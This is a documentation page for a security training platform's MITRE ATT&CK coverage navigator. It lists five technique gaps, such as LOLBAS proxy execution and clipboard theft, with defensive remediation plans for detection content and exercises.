ATT&CK Coverage Navigator¶

This page provides an interactive heatmap of Nexus SecOps content mapped to the MITRE ATT&CK Enterprise framework. Each cell represents a technique under one of the 14 tactics. Color coding shows coverage depth: whether a technique has detection queries, labs, and exercises (green), chapter content only (yellow), or remains a gap (red).

Use this navigator to identify where your detection engineering and training investments are strongest, and where gaps remain. Click any technique cell to see exactly which Nexus content covers it.

Gap Analysis — Top Priority Techniques¶

The following techniques represent the most impactful coverage gaps based on real-world threat intelligence and prevalence data. These are prioritized for future content development.

1. T1218 — System Binary Proxy Execution (Defense Evasion)¶

Priority: Critical | Living-off-the-land binaries (LOLBAS) are used in nearly every sophisticated intrusion. Attackers use trusted Windows binaries like mshta.exe, regsvr32.exe, rundll32.exe, and certutil.exe to proxy execution and bypass application whitelisting.

Remediation plan: Add KQL/SPL detection queries for top 10 LOLBAS binaries, create a Sigma rule set, and develop a purple team exercise.

2. T1593 — Search Open Websites/Domains (Reconnaissance)¶

Priority: High | Adversaries routinely harvest information from job postings, social media, DNS records, and paste sites before targeting an organization. While difficult to detect, awareness and exposure reduction are critical.

Remediation plan: Expand Ch42 (OSINT Advanced) with a defensive OSINT section covering digital footprint reduction and monitoring services.

3. T1585 — Establish Accounts (Resource Development)¶

Priority: High | Threat actors create disposable email, social media, and service accounts to support phishing campaigns and social engineering. Detection focuses on identifying impersonation accounts and suspicious registration patterns.

Remediation plan: Add content to Ch49 (Threat Intelligence Ops) covering adversary infrastructure tracking and takedown procedures.

4. T1563 — Remote Service Session Hijacking (Lateral Movement)¶

Priority: Medium | RDP and SSH session hijacking allows lateral movement without generating new authentication events, making it particularly stealthy. Detection requires monitoring for session enumeration and session switching commands.

Remediation plan: Add detection queries targeting tscon.exe usage and SSH multiplexing anomalies. Include in Lab 06 (AD Attack Paths) as an advanced exercise.

5. T1115 — Clipboard Data (Collection)¶

Priority: Medium | Clipboard monitoring malware captures passwords, cryptocurrency addresses, and sensitive data copied by users. This technique often supports credential theft and financial fraud operations.

Remediation plan: Create Sigma rules for clipboard access API calls and develop a micro-simulation demonstrating clipboard-based credential theft.